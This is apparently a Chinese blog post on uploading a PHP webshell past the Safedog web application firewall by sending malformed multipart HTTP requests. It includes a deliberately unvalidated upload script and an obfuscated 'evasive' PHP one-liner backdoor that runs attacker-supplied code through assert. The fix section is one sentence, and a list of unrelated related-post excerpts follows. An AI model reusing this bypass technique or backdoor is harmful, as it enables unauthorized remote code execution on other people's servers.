繞過網站安全狗攔截,上傳Webshell技巧總結(附免殺PHP一句話)
這篇文章我介紹一下我所知道的繞過網站安全狗上傳WebShell的方法。
思路是:修改HTTP請求,構成畸形HTTP請求,然後繞過網站安全狗的檢測。
廢話不多說,切入正題。。。。
1、實驗環境:
Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、網站安全狗(Apache版)V3.5.12048
2、用於檔案上傳的PHP原始碼:
$path = dirname(__FILE__) . '/upload/';
$rand = rand(0,30);
move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"
echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "<br/>";
echo "OK";
因為此次實驗的目的是繞過網站安全狗,所以PHP原始碼上我沒做任何檢測,把上傳的檔案直接放在upload目錄下。
3、先看一下正常的HTTP請求:
很明顯,檔名為”yijuhua.php”被攔截。。。。
4、嘗試%00截斷:
很明顯,失敗了。。。
5、修改HTTP請求,構造畸形HTTP請求
(1)刪除實體裡面的Conten-Type欄位:
繞過網站安全狗的攔截,成功上傳WebShell。。。
(2)刪除Content-Disposition欄位裡的空格:
(3)修改Content-Disposition欄位值的大小寫:
6、菜刀連線一句話:
到此,上傳WebShell結束,各位看明白了嗎?
7、免殺PHP一句話:
/*
PHP一句話木馬
assert($string)
*/
$arr = array('a','s','s','e','r','t');
$func = '';
for($i=0;$i<count($arr);$i++) {
$func .= $func . $arr[$i];
}
$func($_REQUEST['c']);
8、修復漏洞:
出現這種情況,我認為是網站安全狗在開發時沒有考慮到畸形HTTP請求,而Apache卻相容畸形HTTP請求,所以能夠上傳成功。
相關推薦
繞過網站安全狗攔截,上傳Webshell技巧總結(附免殺PHP一句話)
這篇文章我介紹一下我所知道的繞過網站安全狗上傳WebShell的方法。 思路是:修改HTTP請求,構成畸形HTTP請求,然後繞過網站安全狗的檢測。 廢話不多說,切入正題。。。。 1、實驗環境: Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、網站安全狗(Apac
繞過網站安全狗(圖片繞過)
當我們在滲透一個網站的時候,很多時候,會遇到下面這種情況。網站裝有安全狗,把我們的SQL注入語句給攔截了。 這就是網站的安全狗 此時,我們的滲透會陷入僵局。到底應該如何才能讓我們的語句繞過安全狗的檢查呢? 我們可以自己寫一個頁面,該頁面可以向網站提交資料,我們在提交資料的同時
linux安裝tomcat,jdk,上傳war包分析(不會轉載,只能直接拷貝人家看,作者見了莫怪哈)
1、下載JDK和Tomcat jdk下載地址: http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html tomcat下載地址: http://tomc
Scala+Spark+Hadoop+IDEA實現WordCount單詞計數,上傳並執行任務(簡單例項-下)
Scala+Spark+Hadoop+IDEA上傳並執行任務 本文接續上一篇文章,已經在IDEA中執行Spark任務執行完畢,測試成功。 一、打包 1.1 將setMaster註釋掉 package day05 import
利用SecureCRT上傳、下載檔案(使用sz與rz命令),超實用!
利用SecureCRT上傳、下載檔案(使用sz與rz命令) 藉助securtCRT,使用linux命令sz可以很方便的將伺服器上的檔案下載到本地,使用rz命令則是把本地檔案上傳到伺服器。 其中,對於sz和rz的理解與記憶我用瞭如下的方法(很多時候容易搞混
圖片上傳阿裏雲(對象存儲OSS)
setgid dpa lag 對象存儲 path emf bytearray close node 一、資源 詳細功能及使用方法,請參看“SDK手冊 > Java-SDK”,鏈接地址是:https://help.aliyun.com/d
MUI + Nodejs + Mongodb 圖片上傳的使用總結 (我寫的是頭像上傳 一樣的都是)
為了寫這個功能真的寫了好久 遇到了好多坑 1 ajax傳輸圖片要把圖片轉成base64的 我也不知道為什麼 別的方式後臺接不到 前端程式碼
Linux-ftp伺服器 檔案的上傳和下載總結(1-實名登入)
1.安裝和配置vsftpd 不然會這樣 2.重啟伺服器 3.實名登入 4.上傳檔案 4.1建立檔案—再開一個終端,在home/ftptest目錄下建立檔案haha 4.2 命令:put filename 成功上傳到伺服器zy的home目錄下 附:
PHP檔案的上傳與下載總結(已經很詳細了)
一、一個簡單的圖片上傳例項 1.1、例項程式碼部分 1.2、測試結果 1.3、move_uploaded_file($tmp_name,$destination)函式的使用:將伺服器上的臨時檔案移動到指定的資料夾下 copy($tmp_name,$destination)函式的使用:將伺服器上的臨
上傳圖片裁剪外掛(基於cropper.js的封裝)
如題,這樣的功能在開發中是非常常見的,cropper.js是一款很好的工具,網上都有詳細的介紹,這篇文章提示很多友好的API和事件cropper.js 裁剪圖片並上傳(文件翻譯+demo) cropper.js需要藉助jquery來實現,所以我這裡的樣式抄襲了
ubuntu下使用filezilla上傳檔案許可權問題(open for write: permission denied)
今天在使用filezilla連線虛擬機器中的ubuntu的時候出現上次出錯,錯誤詳情為: open for write: permission denied 看完錯誤大概知道和許可權有問題,
JSP實現檔案上傳下載和刪除(附:JS獲取上傳檔案的檔名)
1.檔案上傳 直接複製專案了,你們有需要的自己看著改吧 表單部分截圖 (新增分類按鈕可忽略) jsp頁面html部分 <form action="" id="form" enctype="multipart/form-data" method="post">
各種下載,檢視文件,學習資料,上傳應用平臺等網站
1、Android Studio 、JDK 、 Tools 、 ADT 、 SDK 、 GRADLE 、映象 等 -----下載地址如下 http://www.android-studio.org/ 2、 天氣氣象介面。 &nb
springmvc java物件轉json,上傳下載(未完)攔截器Interceptor以及原始碼解析(未完待續)
package com.atguigu.my.controller; import java.util.Co
往Github上,上傳本地項目
lin http log 用戶名 ini 會有 png 3.0 上傳 1.先申請一個Github的帳號,創建一個倉庫。 復制這個倉庫的地址: 在本地的項目下依次執行下面的代碼: git init //在本地創建git倉庫 git remote add ori
上傳文件按鈕美化,上傳文件前後狀態控制
http val lee 圖片 html return hid jpg 按鈕 我們在做input文本上傳的時候,html自帶的上傳按鈕比較醜,如何對其進行美化呢?同理:input checkbox美化,input radio美化是一個道理的. input file上傳按鈕
ueditor 後端配置項沒有正常加載,上傳插件不能正常使用!
建議 工廠 代碼 修改 area mat 結構 editor 例如 我用的是開發版,1.4.3.3 .Net版 網上查了很多,後來發現只是配置的問題而已。 在根目錄下:config.json 其中有Img上傳的配置:imageUrlPrefix 這個是你上傳完成後,在文本編
DOS批處理器移動指定數量文件到一個臨時文件夾,上傳到linux服務器,並刪除臨時文件夾下的文件
dosDOS批處理器移動指定數量文件到一個臨時文件夾,上傳到linux服務器,並刪除臨時文件夾下的文件,上傳需要依賴pscp.exe。腳本如下:@echo off&setlocal enabledelayedexpansion #將400個xml文件從M:\dockerEPG\目錄下移動到M:\scp
在Windows 2008 R2 Server中,上傳視頻遇到的問題
mage uri 視頻 打開 技術 stl con 4.5 點擊 在Windows 2008 R2 Server中,上傳視頻不能播放,以及服務器大小限制問題,這裏記錄我的解決方法,以免再次遇到,無所適從。 1、上傳視頻不能播放 打開IIS,找到“MIME類型”,如下:
selenium實戰 二 進入博客園,上傳圖片並發帖
編輯 sendkeys arr accept 圖片 .cn ledir car spa 1 #-*- coding:utf-8 -*- 2 __author__ = "carry" 3 4 from selenium import webdriver 5 im